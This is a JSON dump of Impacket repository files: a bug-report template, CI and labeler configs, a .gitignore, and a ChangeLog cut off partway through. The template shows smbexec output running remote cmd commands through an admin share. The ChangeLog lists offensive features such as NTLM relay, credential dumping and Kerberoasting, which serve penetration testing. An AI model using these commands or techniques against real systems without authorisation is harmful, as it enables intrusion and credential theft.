[ { "path": ".github/ISSUE_TEMPLATE/bug_report.md", "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n### Configuration \nimpacket version: \nPython version: \nTarget OS: \n\n### Debug Output With Command String \ni.e. \nsmbexec -debug domain/user:password@127.0.0.1 \n```\nsmbexec -debug domain/user:password@127.0.0.1\n[+] StringBinding ncacn_np:127.0.0.1[\\pipe\\svcctl]\n[+] Executing %COMSPEC% /Q /c echo cd ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat\n[!] Launching semi-interactive shell - Careful what you execute\nC:\\Windows\\system32>net group\n[+] Executing %COMSPEC% /Q /c echo net group ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat\nTraceback (most recent call last):\n File \"/usr/lib64/python3.7/cmd.py\", line 214, in onecmd\n func = getattr(self, 'do_' + cmd)\nAttributeError: 'RemoteShell' object has no attribute 'do_net'\n```\n\n### PCAP \nIf applicable, add a packet capture to help explain your problem.\n\n### Additional context \nSpace for additional context, investigative results, suspected issue.\n" }, { "path": ".github/labeler.yml", "content": "# Rules to label Pull Requests\nversion: 1\nlabels:\n - label: \"Examples\"\n files:\n - \"examples/.*\"\n - label: \"Library\"\n files:\n - \"impacket/.*\"\n - label: \"CI/CD & Tests\"\n files:\n - \"tests/.*\"\n - \"tox.ini\"\n - \"Dockerfile\"\n - \".github/.*\"\n - label: \"Setup\"\n files:\n - \"setup.py\"\n - \"requirements*.txt\"\n - \"MANIFEST.in\"\n - label: \"Docs\"\n files:\n - \"*.md\"\n - \"LICENSE\"\n" }, { "path": ".github/workflows/build_and_test.yml", "content": "# GitHub Action workflow to build and run Impacket's tests\n#\n\nname: Build and test Impacket\n\non: [push, pull_request]\n\nenv:\n DOCKER_TAG: impacket:latests\n\njobs:\n lint:\n name: Check syntax errors and warnings\n runs-on: ubuntu-latest\n if:\n github.event_name == 'push' || github.event.pull_request.head.repo.full_name !=\n github.repository\n\n steps:\n - name: Checkout Impacket\n uses: actions/checkout@v3\n\n - name: Setup Python 3.8\n uses: actions/setup-python@v4\n with:\n python-version: 3.8\n\n - name: Install Python dependencies\n run: |\n python -m pip install flake8\n\n - name: Check syntax errors\n run: |\n flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics\n\n - name: Check PEP8 warnings\n run: |\n flake8 . --count --ignore=E1,E2,E3,E501,W291,W293 --exit-zero --max-complexity=65 --max-line-length=127 --statistics\n\n test:\n name: Run unit tests and build wheel\n needs: lint\n runs-on: ${{ matrix.os }}\n if:\n github.event_name == 'push' || github.event.pull_request.head.repo.full_name !=\n github.repository\n\n strategy:\n fail-fast: false\n matrix:\n python-version: [\"3.9\", \"3.10\",\"3.11\",\"3.12\"]\n experimental: [false]\n os: [ubuntu-latest]\n include:\n - python-version: \"3.13-dev\"\n experimental: true\n os: ubuntu-latest\n continue-on-error: ${{ matrix.experimental }}\n\n steps:\n - name: Checkout Impacket\n uses: actions/checkout@v3\n\n - name: Setup Python ${{ matrix.python-version }}\n uses: actions/setup-python@v4\n with:\n python-version: ${{ matrix.python-version }}\n\n - name: Install Python dependencies\n run: |\n python -m pip install --upgrade pip wheel\n python -m pip install tox tox-gh-actions -r requirements.txt -r requirements-test.txt\n\n - name: Run unit tests\n run: |\n tox -- -m 'not remote'\n\n - name: Build wheel artifact\n run: |\n python setup.py bdist_wheel\n\n docker:\n name: Build docker image\n needs: lint\n runs-on: ubuntu-latest\n if:\n github.event_name == 'push' || github.event.pull_request.head.repo.full_name !=\n github.repository\n\n continue-on-error: true\n steps:\n - name: Checkout Impacket\n uses: actions/checkout@v3\n\n - name: Build docker image\n run: |\n docker build -t ${{ env.DOCKER_TAG }} .\n" }, { "path": ".github/workflows/labeler.yml", "content": "# GitHub Action workflow to label Pull Requests\n#\n\nname: Label PRs\n\non:\n - pull_request\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: srvaroa/labeler@master\n env:\n GITHUB_TOKEN: \"${{ secrets.GITHUB_TOKEN }}\"\n" }, { "path": ".gitignore", "content": "# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nenv/\nvenv/\n.env/\n.venv/\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\n*.egg-info/\n.installed.cfg\n*.egg\n\nPipfile\nPipfile.lock\n\n# PyInstaller\n# Usually these files are written by a python script from a template\n# before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*,cover\n\n# bak files\n*.bak\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# macOS\n.DS_Store\n\n# PyCharm\n.idea\n\n# Test cases configuration\ntests/dcetests.cfg" }, { "path": "ChangeLog.md", "content": "# ChangeLog\n\nProject owner's main page is at www.coresecurity.com.\n\nComplete list of changes can be found at:\nhttps://github.com/fortra/impacket/commits/master\n\n## Impacket v0.13.0 (Oct 2025): \n\n1. Library improvements \n\n * Major SMB client/server refactor adds setInfo support, CIFS datetime helpers, and safer default share access to enable remote attribute and timestamp management. (@covertivy) \n\n * Introduced per-structure encoding selectors and UTF-8-aware SMB structures so non-Latin resource names round-trip correctly. (@alexisbalbachan) \n\n * Strengthened LDAP/Kerberos handling with channel binding plus signing, schema alignment with ldap3, and LDAPS-based LAPS retrieval against Windows Server 2025 DCs. (@zblurx, @alexisbalbachan, @Ibrahim8879) \n\n * Improved DCE/RPC coverage with Netlogon authenticator fixes, updated DRS bind flags, expanded EVEN6 decoding, and a new ICPR interface to support relay-aware RPC workflows. (@ThePirateWhoSmellsOfSunflowers, @h3-josh-the-engineer, @NtAlexio2, @rtpt-romankarwacik) \n\n * Corrected SMB negotiation edge cases by fixing response padding, Unicode pipe lookups, and keyboard interrupts in SMB servers. (@rtpt-erikgeiser, @Abyss-emmm, @exploide) \n\n * SMB Server enhancements to align Impacket's implementation with standard (@jborean93) \n\n \n\n2. Authentication & relay tooling \n\n * Added WinRMS relay clients/servers. (@Defte_) \n\n * Improved IPv6 support, richer logging, and consistent console status reporting, plus an identity log to track compromised principals ( @gabrielg5) \n\n * Introduced an RPC relay server with Endpoint Mapper discovery . (@rtpt-romankarwacik) \n\n * Delivered SCCM Management/Distribution Point relay attacks. (@q-roland) \n\n * Enhanced shadow credentials, SOCKS plugins, and target rotation with better IPv6 awareness and stability. (@anadrianmanrique, @gabrielg5) \n\n * Added options to strip SSP from Net-NTLMv1 captures and write relay-captured hashes for cracking workflows. (@TurtleARM, @p0rtL6) \n\n \n\n3. Examples improvements \n\n * secretsdump.py gained a WMI shadow snapshot path, export hive boot key recovery, safer DRS flags, user-status reporting, and refined NTDS parsing. (@PeterGabaldon, @MaxToffy, @h3-josh-the-engineer, @Markb1337, @snovvcrash) \n\n * MSSQL tooling gained channel binding tokens, restored reliable connections, richer linked-server file transfers, and inline command execution. (@Defte_, @rtpt-romankarwacik, @trietend, @kiriknik, @Signum21) \n\n * Directory ACL helpers (`dacledit`, `owneredit`, `rbcd`, `ldapshell`) picked up mask selection, safer queries, and consistent `-dc-host` handling. (@dadevel, @shellinvictus, @Fabrizzio53, @ICheer_No0M, @gabrielg5) \n\n * SMB operator utilities add reconnect and autocomplete options in smbclient and prevent smbexec from hanging on completion. (@daddycocoaman, @trietend, @Vincent550102) \n\n * Remote access helpers such as rdp_check and wmiexec now support IPv6 targets and display created Process IDs for easier triage. (@gabrielg5, @alexisbalbachan) \n\n \n\n4. New examples \n\n * [attrib.py](examples/attrib.py) manipulates file attributes over SMB to showcase the new setInfo workflow. (@covertivy) \n\n * [filetime.py](examples/filetime.py) inspects and updates SMB file timestamps using the refreshed SMBConnection APIs. (@covertivy) \n\n * [badsuccessor.py](examples/badsuccessor.py) demonstrates the AD CS “bad successor” attack path. (@fulc2um) \n\n * [regsecrets.py](examples/regsecrets.py) extracts LSA secrets from remote registry hives through [MS-RRP]. (@laxaa, @laxa) \n\n * [samedit.py](examples/samedit.py) edits local SAM password hashes offline. (@iorpim) \n\n * [CheckLDAPStatus.py](examples/CheckLDAPStatus.py) checks LDAP signing status and LDAPS channel binding status. (@zblurx) \n\n \n\n \n\n5. Project & packaging \n\n * Added the `impacket.mssql` namespace, relaxed the pyOpenSSL pin, and declared Python 3.13 support while dropping 3.8. (@anadrianmanrique, @Defte_) \n\n * Replaced pkg_resources with importlib.metadata for lightweight version discovery. (@AdrianVollmer) \n\n \n\n6. Contributors \n\nAs always, thanks a lot to all these contributors that make this library better every day (up to now):\n \n@Abyss-emmm, @AdrianVollmer, @NeffIsBack, @NtAlexio2, @rtpt-alexanderneumann, @asareynolds, @dadevel, @TurtleARM, @Defte_, @rtpt-erikgeiser, @Fabrizzio53, @fluffy-kaiju, @gabrielg5, @ICheer_No0M, @exploide, @jborean93, @nitbx, @laxaa, @daddycocoaman, @lucas0817, @Markb1337, @MaxToffy, @Ibrahim8879, @Narmjep, @NuclearFizzler, @iorpim, @CipherCloak, @PeterGabaldon, @b1two, @covertivy, @rtpt-romankarwacik, @ryanq47, @SAERXCIT, @Signum21, @ThePirateWhoSmellsOfSunflowers, @Vincent550102, @anadrianmanrique, @alexisbalbachan, @d0gkiller87, @Ridter, @fulc2um, @gjhami, @h3-josh-the-engineer, @kiriknik, @marcobarlottini, @p0rtL6, @q-roland, @shellinvictus, @trietend, @zblurx. \n\n \n\n## Impacket v0.12.0 (Sep 2024):\n1. Library improvements\n * Fixed broken hRSetServiceObjectSecurity method (@rkivys)\n * Removed dsinternals dependency (@anadrianmanrique)\n * Fixed srvs.hNetrShareEnum returning erronous shares (@cnotin)\n * Fixed lmhash computing to support non standard characters in the password (@anadrianmanrique)\n * Assorted fixes when processing Unicode data (@alexisbalbachan)\n * Added `[MS-GKDI]` Group Key Distribution Protocol implementation (@zblurx)\n * Fixed incorrect padding in SMBSessionSetupAndX_Extended_ResponseData (@rtpt-erikgeiser)\n * Upgraded dependency pyreadline -> pyreadline3 (@anadrianmanrique)\n * SMB Server:\n \t* Added query information level 0x0109 for smb1 \"SMB_QUERY_FILE_STREAM_INFO\" (@Adamkadaban)\n \t* Fixed filename encoding in queryPathInformation (@JerAxxxxxxx)\n \t* Fixed NextEntryOffset for large directory listings (@robnanola)\n \t* Fixed server returning an empty folder when cutting and pasting recursive directories (@robnanola)\n * DHCP: Fixed encoding issues (@ujwalkomarla)\n\n3. Examples improvements\n * [secretsdump.py](examples/secretsdump.py):\n * Double DC Sync performance for DCs supporting SID lookups (@tomspencer)\n * Added ability to skip dumping of SAM or SECURITY hives when performing remote operations (@RazzburyPi)\n * Added ability to specify users to skip when dumping NTDS (@RazzburyPi)\n * [ticketer.py](examples/ticketer.py):\n * Support to create Sapphire tickets (@ShutdownRepo)\n * [GetUserSPNs.py](examples/GetUserSPNs.py), [getTGT.py](examples/getTGT.py):\n * Support for Kerberoasting without pre-authentication and ST request through AS-REQ (@ShutdownRepo)\n * [wmiexec.py](examples/wmiexec.py):\n * Fix kerberos with remoteHost & add '-target-ip'(@XiaoliChan)\n * [ntlmrelayx.py](examples/ntlmrelayx.py):\n * Added the creation of a new machine account through SMB (@BlWasp)\n * NTLMRelayX Multirelay fixes for target handling, added --keep-relaying flag (@alexisbalbachan)\n * Logging multirelay status when triggering the example (@gabrielg5)\n * Write certificates to file rather than outputting b64 to console (@RazzburyPi)\n * Improved ability to continue relaying to ADCS web enrollment endpoint in order to request multiple certificates for different users (@RazzburyPi)\n * Fixed compatibility issue with other SMB clients connecting to the SOCKS proxy created by ntlmrelayx (@jfjallid)\n * Allow configuration of the SOCKS5 address and port (@rtpt-erikgeiser)\n * Fixed implementation of MSSQLShell (@gabrielg5)\n * Logging notification of received connections in all relay servers (@gabrielg5)\n * Add domain and username to interactive Ldap shell message (@minniear)\n * Enhanced MSSQLShell in NTLMRelayX leveraging TcpShell & output messages (@gabrielg5)\n * LDAP Attack: Bugfixes when parsing responses (@SAERXCIT)\n * [getST.py](examples/getST.py):\n * Added -self, -altservice and -u2u for S4U2self abuse, S4U2self+u2u, and service substitution (@ShutdownRepo)\n * Added ability to set the RENEW ticket option to renew a TGT (@shikatano)\n * Fixed unicode encoding error when using the -impersonate flag (@alexisbalbachan)\n * [getTGT.py](examples/getTGT.py):\n * Added principalType as new parameter (@DevSpork)\n * [reg.py](examples/reg.py):\n * Start remote registry as unprivileged user in reg.py (@dadevel)\n * Allow adding Binary values (@dc3l1ne)\n * Add missing Null byte for REG_SZ values (@PfiatDe)\n * Support for adding REG_MULTI_SZ values through (@garbrielg5)\n * [smbclient.py](examples/smbclient.py):\n \t* Added ability to provide an output file that the smbclient mini shell will write commands and output to (@RazzburyPi)\n \t* Fixed path parse issue when running `tree` command (@trietend)\n * [smbserver.py](examples/smbserver.py):\n * Added parameter \"-outputfile\" to set smbserver log file(gabrielg5) \n * [DumpNTLMInfo.py](examples/DumpNTLMInfo.py):\n \t* Allow execution on non-default ports (@jeffmcjunkin)\n \t* Fixed KeyError exception when running with a Windows 2003 target (@XiaoliChan)\n * [findDelegation.py](examples/findDelegation.py):\n \t* Added new column to show if SPN exists (@p0dalirius)\n * [mssqlclient.py](examples/mssqlclient.py):\n \t* Added `-target-ip` parameter to allow Kerberos authentication without much change in the DNS configuration of the local machine (@Palkovsky)\n * [mssqlshell.py](examples/mssqlshell.py):\n \t* Switching back to original DB after running `enum_impersonate` command (@exploide)\n * Fixed logging in printReplies showing error messages (@gabrielg5)\n * [registry-read.py](examples/registry-read.py):\n \t* Fixed scenario where value name contains backlash (@DidierA)\n * [net.py](examples/net.py):\n \t* Fixed User \"Account Active\" property value (@marcobarlottini)\n * Fixed log messages printing variables in the wrong order (@Cyb3rC3lt) \n * [rbcd.py](examples/rbcd.py):\n * Handled SID not found in LDAP error (@ShutdownRepo)\n * [GetUserSPNs.py](examples/GetUserSPNs.py):\n \t* Updated the help information for -outputfile to be consistent with -save (@scarvell)\n * [ntfs-read.py](examples/ntfs-read.py):\n * Minor refactor in ntfs-read.py to make it more human-readable (@NtAlexio2)\n * [ldap_shell.py](examples/ldap_shell.py):\n * Added support for dirsync and whoami commands (@nurfed1)\n * [lookupsid.py](examples/lookupsid.py):\n * Now supports kerberos auth (@A1vinSmith)\n * [samrdump.py](examples/samrdump.py):\n * Will fetch AdminComment using MSRPC (@joeldeleep)\n * [tstool.py](examples/tstool.py):\n * Added support for kerberos auth, resolves SIDs (@nopernik) \n \n4. New examples\n * [describeTicket.py](examples/describeTicket.py): Ticket describer and decrypter. (@ShutdownRepo)\n * [GetADComputers.py](examples/GetADComputers.py): Query's DC via LDAP and returns the COMPUTER objects and the useful attributes such as full dns name, operating system name and version. (@F-Masood)\n * [GetLAPSPassword.py](examples/GetLAPSPassword.py): Extract LAPS passwords from LDAP (@zblurx and @dru1d-foofus)\n * [dacledit.py](examples/dacledit.py): This script can be used to read, write, remove, backup, restore ACEs (Access Control Entries) in an object DACL (Discretionary Access Control List). (@ShutdownRepo) (@BlWasp_) (@Wlayzz)\n * [owneredit.py](examples/owneredit.py): Added this script to abuse WriteOwner (ADS_RIGHT_WRITE_OWNER) access rights. This allows to take ownership of another object, and then edit that object's DACL (@ShutdownRepo) (@BlWasp_)\n\nAs always, thanks a lot to all these contributors that make this library better every day (up to now):\n\n@tomspencer @anadrianmanrique @ShutdownRepo @dadevel @gjhami @NtAlexio2 @F-Masood @BlWasp @gabrielg5 @XiaoliChan @omry99 @Wlayzz @themaks @alexisbalbachan @RazzburyPi @jeffmcjunkin @p0dalirius @dc3l1ne @jfjallid @Palkovsky @rtpt-erikgeiser @trietend @zblurx @dru1d-foofus @PfiatDe @DidierA @marcobarlottini @PeterGabaldon @m8r1us @5yn @tzuralon @Adamkadaban @scarvell @JerAxxxxxxx @ujwalkomarla @robnanola @SAERXCIT @nurfed1 @A1vinSmith @joeldeleep @nopernik\n\n\t \n## Impacket v0.11.0 (Aug 2023):\n1. Library improvements \n * Added new Kerberos error codes (@ly4k).\n\t* Added `[MS-TSTS]` Terminal Services Terminal Server Runtime Interface Protocol implementation (@nopernik).\n * Changed the setting up for new SSL connections (@mpgn, @CT-H00K and @0xdeaddood).\n * Added a callback function to smbserver for incoming authentications (@p0dalirius).\n * Fix crash in winregistry (@laxa)\n * Fixes in IDispatch derived classes in comev implementation (@NtAlexio2)\n * Fix CVE-2020-17049 in ccache.py (@godylockz)\n * Smbserver: Added SMB2_FILE_ALLOCATION_INFO type determination (@JerAxxxxxxx)\n * tds: Fixed python3 incompatibility when receiving over TLS socket (@exploide)\n * crypto: Ensure passwords are utf-8 encoded before deriving Kerberos keys (@jojonas)\n * ese: Fixed python3 incompatibility when reading from db (@alexisbalbachan)\n * ldap queries: Escaped characters are now correctly parsed (@alexisbalbachan)\n * Support SASL authentication in ldap protocol (@NtAlexio2)\n\n2. Examples improvements\n * [GetADUsers.py](examples/GetADUsers.py), [GetNPUsers.py](examples/GetNPUsers.py), [GetUserSPNs.py](examples/GetUserSPNs.py) and [findDelegation.py](examples/findDelegation.py):\n * Added dc-host option to connect to specific KDC using its FQDN or NetBIOS name (@rmaksimov and @0xdeaddood).\n * [GetNPUsers.py](examples/GetNPUsers.py)\n * Printing TGT in stdout despite -outputfile parameter (@alexisbalbachan and @Zamanry)\n * Fixed output hash format for AES128/256 (etype 17/18) (@erasmusc)\n * [GetUserSPNs.py](examples/GetUserSPNs.py):\n * Added LDAP paged search (@ThePirateWhoSmellsOfSunflowers and @SAERXCIT).\n * Added a -stealth flag to remove the SPN filter from the LDAP query (@clavoillotte).\n * Improved searchFilter (@ShutdownRepo)\n * Use LDAP paged search (@ThePirateWhoSmellsOfSunflowers)\n * [psexec.py](examples/psexec.py):\n * Added support for name customization using a custom binary file (@Dramelac).\n * [smbexec.py](examples/smbexec.py):\n * Security fixes for privilege escalation vulnerabilities (@bugch3ck).\n * Fixed python3 compatibility issues, added workaround TCP over NetBIOS being disabled (@ljrk0)\n * [secretsdump.py](examples/secretsdump.py):\n * Added a new option to extract only NTDS.DIT data for specific users based on an LDAP filter (@snovvcrash).\n * Security fixes for privilege escalation vulnerabilities (@bugch3ck). \n * [mssqlclient.py](examples/mssqlclient.py):\n * Added multiple new commands. Now supports xp_dirtree execution (@Mayfly277, @trietend and @TurtleARM).\n * [ntlmrelayx.py](examples/ntlmrelayx.py):\n * Added ability to trigger SQLShell when running ntlmrelayx in interactive mode (@sploutchy).\n * Added filter option to the socks command in ntlmrelayx CLI (@shoxxdj)\n * Added ability to register DNS records through LDAP.\n * [addcomputer.py](examples/addcomputer.py), [rbcd.py](examples/rbcd.py):\n * Allow weak TLS ciphers for LDAP connections (@AdrianVollmer)\n * [Get-GPPPassword.py](examples/Get-GPPPassword.py):\n * Better handling of various XML files in Group Policy Preferences (@p0dalirius)\n * [smbclient.py](examples/smbclient.py):\n * Added recursive file listing (@Sq00ky)\n * [ticketer.py](examples/ticketer.py):\n * Ticket duration is now specified in hours instead of days (@Dramelac)\n * Added extra-pac implementation (@Dramelac)\n\n3. New examples\n * [net.py](examples/net.py) Implementation of windows net.exe builtin tool (@NtAlexio2)\n * [changepasswd.py](examples/changepasswd.py) New example that allows password changing or reseting through multiple protocols (@Alef-Burzmali, @snovvcrash, @bransh, @api0cradle and @p0dalirius)\n * [DumpNTLMInfo.py](examples/DumpNTLMInfo.py) New example that dumps remote host information in ntlm authentication model, without credentials. For SMB protocols v1, v2 and v3. (@NtAlexio2)\n \nAs always, thanks a lot to all these contributors that make this library better every day (up to now):\n\n@ly4k @nopernik @snovvcrash @ShutdownRepo @kiwids0220 @mpgn @CT-H00K @rmaksimov @arossert @aevy-syn @tirkarthi @p0dalirius @Dramelac @Mayfly277 @S3cur3Th1sSh1t @nobbd @AdrianVollmer @trietend @TurtleARM @ThePirateWhoSmellsOfSunflowers @SAERXCIT @clavoillotte @Marshall-Hallenbeck @sploutchy @almandin @rtpt-alexanderneumann @JerAxxxxxxx @NtAlexio2 @laxa @godylockz @exploide @jojonas @Zamanry @erasmusc @bugch3ck @ljrk0 @Sq00ky @shoxxdj @Alef-Burzmali @bransh @api0cradle @alexisbalbachan @0xdeaddood @NtAlexio2 @sanmopre\n\n\n## Impacket v0.10.0 (May 2022):\n\n1. Library improvements \n * Dropped support for Python 2.7.\n * Refactored the testing infrastructure (@martingalloar):\n * Added `pytest` as the testing framework to organize and mark test\n cases. `Tox` remain as the automation framework, and `Coverage.py`\n for measuring code coverage.\n * Custom bash scripts were replaced with test cases auto-discovery.\n * Local and remote test cases were marked for easy run and configuration. \n * DCE/RPC endpoint test cases were refactored and moved to a new layout. \n * An initial testing guide with the main steps to prepare a testing environment and run them. \n * Fixed a good amount of DCE/RPC endpoint test cases that were failing. \n * Added tests for `[MS-PAR]`, `[MS-RPRN]`, CCache and DPAPI.\n * Added a function to compute the Netlogon Authenticator at client-side in `[MS-NRPC]` (@0xdeaddood)\n * Added `[MS-DSSP]` protocol implementation (@simondotsh)\n * Added GetDriverDirectory functions to `[MS-PAR]` and `[MS-RPRN]` (@raithedavion)\n * Refactored the Credential Cache:\n\t * Added new parseFile function to ccache.py (@rmaksimov)\n\t * Added support for loading CCache Version 3 (@reznok)\n\t * Modified fromKRBCRED function used to load a Kirbi file (@0xdeaddood)\n\t * Fixed Ccache to Kirbi conversion (@ShutdownRepo)\n\t* Fixed default NTLM server challenge in smbserver (@rtpt-jonaslieb)\n\n2. Examples improvements\n\t* [exchanger.py](examples/exchanger.py):\n\t * Fixed a bug when a Global Address List doesn't exist on the server (@mohemiv)\n\t* [mimikatz.py](examples/mimikatz.py)\n\t * Updated intro to not trigger the AV on windows (@mpgn)\n\t* [ntlmrelayx.py](examples/ntlmrelayx.py):\n\t * Implemented RAW Relay Server (@CCob)\n\t * Added an LDAP attack dumping information about the domain's ADCS enrollment services (@SAERXCIT)\n * Added multi-relay feature to the HTTP Relay Server. Now one incoming HTTP connection could be \n used against multiple targets (@0xdeaddood)\n * Added an option to disable the multi-relay feature (@zblurx and @0xdeaddood)\n * Added multiple HTTP listeners running at the same time (@SAERXCIT)\n * Support for the ADCS ESC1 and ESC6 attacks (@hugo-syn)\n * Added Shadow Credentials attack (@ShutdownRepo, @Tw1sm, @nodauf and @p0dalirius)\n * Added the ability to define a password for the LDAP attack addComputer (@ShutdownRepo)\n * Added rename_computer and modify add_computer in LDAP interactive shell (@capnkrunchy)\n * Implemented StartTLS (@ThePirateWhoSmellsOfSunflowers)\n * [reg.py](examples/reg.py):\n * Added save function to allow remote saving of registry hives (@ShutdownRepo and @scopedsecurity)\n * [secretsdump.py](examples/secretsdump.py):\n * Added an option to dump credentials using the Kerberos Key List attack (@0xdeaddood)\n * [smbpasswd.py](examples/smbpasswd.py):\n * Added an option to force credentials change via injecting new values into SAM (@snovvcrash and @alefburzmali)\n3. New examples\n\t* [machine_role.py](examples/machine_role.py): This script retrieves a host's role along with its \n\t primary domain details (@simondotsh)\n * [keylistattack.py](examples/keylistattack.py): This example implements the Kerberos Key List\n attack to dump credentials abusing RODCs and Azure AD Kerberos Servers (@0xdeaddood)\n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version):\n\n@rmaksimov @simondotsh @CCob @raithedavion @SAERXCIT @Maltemo @dirkjanm @reznok @ShutdownRepo @scopedsecurity @Tw1sm @nodauf @p0dalirius @zblurx @hugo-syn @capnkrunchy @mohemiv @mpgn @rtpt-jonaslieb @snovvcrash @alefburzmali @ThePirateWhoSmellsOfSunflowers @jlvcm\n\n## Impacket v0.9.24 (October 2021):\n\n1. Library improvements \n\t* Fixed WMI objects parsing (@franferrax)\n\t* Added the RpcAddPrinterDriverEx method and related structures to `[MS-RPRN]`: Print System Remote Protocol (@cube0x0)\n\t* Initial implementation of `[MS-PAR]`: Print System Asynchronous Remote Protocol (@cube0x0)\n\t* Complying `[MS-RPCH]` with HTTP/1.1 (@mohemiv) \n\t* Added return of server time in case of Kerberos error (@ShutdownRepo and @Hackndo)\n\n2. Examples improvements\n\t* [getST.py](examples/getST.py):\n\t * Added support for a custom additional ticket for S4U2Proxy (@ShutdownRepo)\n\t* [ntlmrelayx.py](examples/ntlmrelayx.py):\n\t * Added Negotiate authentication support to the HTTP server (@LZD-TMoreggia) \n\t * Added anonymous session handling in the HTTP server (@0xdeaddood)\n\t * Fixed error in ldapattack.py when trying to escalate with machine account (@Rcarnus) \n\t * Added the implementation of AD CS attack (@ExAndroidDev)\n\t * Disabled the anonymous logon in the SMB server (@ly4k)\n\t* [psexec.py](examples/psexec.py):\n\t * Fixed decoding problems on multi bytes characters (@p0dalirius)\n\t* [reg.py](examples/reg.py):\n\t * Implemented ADD and DELETE functionalities (@Gifts) \n\t* [secretsdump.py](examples/secretsdump.py):\n\t * Speeding up NTDS parsing (@skelsec)\n\t* [smbclient.py](examples/smbclient.py):\n\t * Added 'mget' command which allows the download of multiple files (@deadjakk)\n\t * Handling empty search count in FindFileBothDirectoryInfo (@martingalloar)\n\t* [smbpasswd.py](examples/smbpasswd.py):\n\t * Added the ability to change a user's password providing NTLM hashes (@snovvcrash)\n\t* [smbserver.py](examples/smbserver.py): \n\t * Added NULL SMBv2 client connection handling (@0xdeaddood)\n\t * Hardened path checks and Added TID checks (@martingalloar)\n\t * Added SMB2 support to QUERY_INFO Request and Enabled SMB_COM_FLUSH method (@0xdeaddood)\n\t * Added missing constant and structure for the QUERY_FS Information Level SMB_QUERY_FS_DEVICE_INFO (@martingalloar) \n\t* [wmipersist.py](examples/wmipersist.py):\n\t * Fixed VBA script execution and improved error checking (@franferrax)\n\n3. New examples\n\t* [rbcd.py](examples/rbcd.py): Example script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer (@ShutdownRepo and @p0dalirius) (based on the previous work of @tothi and @NinjaStyle82)\n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version):\n\n@deadjakk @franferrax @cube0x0 @w0rmh013 @skelsec @mohemiv @LZD-TMoreggia @exploide @ShutdownRepo @Hackndo @snovvcrash @rmaksimov @Gifts @Rcarnus @ExAndroidDev @ly4k @p0dalirius\n\n\n## Impacket v0.9.23 (June 2021):\n\n1. Library improvements \n\t* Support connect timeout with SMBTransport (@vruello)\n\t* Speeding up DcSync (@mohemiv)\n\t* Fixed Python3 issue when serving SOCKS5 requests (@agsolino) \n\t* Moved docker container to Python 3.8 (@mgallo) \n\t* Added basic GitHub Actions workflow (@mgallo) \n\t* Fixed Path Traversal vulnerabilities in `smbserver.py` - CVE-2021-31800 (@omriinbar AppSec Researcher at CheckMarx) \n\t* Fixed POST request processing in `httprelayserver.py` (@Rcarnus) \n\t* Added cat command to `smbclient.py` (@mxrch) \n\t* Added new features to the LDAP Interactive Shell to facilitate AD exploitation (@AdamCrosser) \n\t* Python 3.9 support (@meeuw and @cclauss) \n\n2. Examples improvements\n\t* [addcomputer.py](examples/addcomputer.py): \n\t * Enable the machine account created via SAMR (@0xdeaddood) \n\t* [getST.py](examples/getST.py): \n\t * Added exploit for CVE-2020-17049 - Kerberos Bronze Bit attack (@jakekarnes42) \n\t * Compute NTHash and AESKey for the Bronze Bit attack automatically (@snovvcrash) \n\t* [ntlmrelayx.py](examples/ntlmrelayx.py): \n\t * Fixed target parsing error (@0xdeaddood) \n\t* [wmipersist.py](examples/wmipersist.py): \n\t * Fixed `filterBinding` error (@franferrax) \n\t * Added PowerShell option for semi-interactive shells in `dcomexec.py`, `smbexec.py`\n and `wmiexec.py` (@snovvcrash) \n\t * Added new parameter to select `COMVERSION` in `dcomexec.py`, `wmiexec.py`,\n `wmipersist.py` and `wmiquery.py` (@zexusx26) \n\n3. New examples \n\t* [Get-GPPPassword.py](examples/Get-GPPPassword.py): This example extracts and decrypts\n Group Policy Preferences passwords using streams for treating files instead of mounting\n shares. Additionally, it can parse GPP XML files offline (@ShutdownRepo and @p0dalirius) \n\t* [smbpasswd.py](examples/smbpasswd.py): This script is an alternative to `smbpasswd` tool and\n intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR) (@snovvcrash) \n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version): \n\n@mpgn @vruello @mohemiv @jagotu @jakekarnes42 @snovvcrash @zexusx26 @omriinbar @Rcarnus @nuschpl @mxrch @ShutdownRepo @p0dalirius @AdamCrosser @franferrax @meeuw and @cclauss \n\n\n## Impacket v0.9.22 (November 2020):\n\n1. Library improvements\n * Added implementation of RPC over HTTP v2 protocol (by @mohemiv).\n * Added `[MS-NSPI]`, `[MS-OXNSPI]` and `[MS-OXABREF]` protocol implementations (by @mohemiv).\n * Improved the multi-page results in LDAP queries (by @ThePirateWhoSmellsOfSunflowers).\n * NDR parser optimization (by @mohemiv).\n * Improved serialization of WMI method parameters (by @tshmul).\n * Introduce the `[MS-NLMP]` `2.2.2.10` `VERSION` structure in `NTLMAuthNegotiate` messages (by @franferrax).\n * Added some NETLOGON structs for `NetrServerPasswordSet2` (by @dirkjanm).\n * Python 3.8 support.\n\n2. Examples improvements\n\t* [atexec.py](examples/atexec.py):\n * Fixed after MS patches related to RPC attacks (by @mohemiv).\n\t* [dpapi.py](examples/dpapi.py):\n * Added `-no-pass`, `pass-the-hash` and AES Key support for backup subcommand.\n\t* 